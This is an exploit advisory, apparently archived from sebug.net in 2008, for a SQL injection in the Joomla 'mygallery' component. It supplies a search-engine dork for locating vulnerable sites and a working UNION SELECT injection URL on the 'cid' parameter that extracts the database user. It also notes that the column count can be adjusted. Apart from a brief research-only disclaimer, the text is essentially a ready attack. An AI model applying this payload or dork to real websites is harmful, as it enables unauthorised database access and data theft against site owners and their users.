Joomla Component mygallery (cid) Remote SQL Injection Vulnerability
发布时间(Published):2008-07-01
[www.sebug.net]
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
H-T Team { HouSSamix & ToXiC350 }
=====================================================================
Joomla Component mygallery Remote SQL Injection Exploit
=====================================================================
## AUTHOR : HouSSamix From H-T TeaM
## Script : mygallery Joomla Component ( version unknown )
## DorKs : inurl:index.php?option=com_mygallery "cid"
## EXPLOIT :
index.php?option=com_mygallery&func=viewcategory&cid=-1%20union%20select%201,2,user(),4,5,6,7,8,9,10,11,12--
## Note : the number of columns can be diffrent .
## GREETZ : CoNaN & Islam security Team & Mr l3frite & Mounita20 and all musulmans hackers
// Sebug.net [ 2008-07-02 ]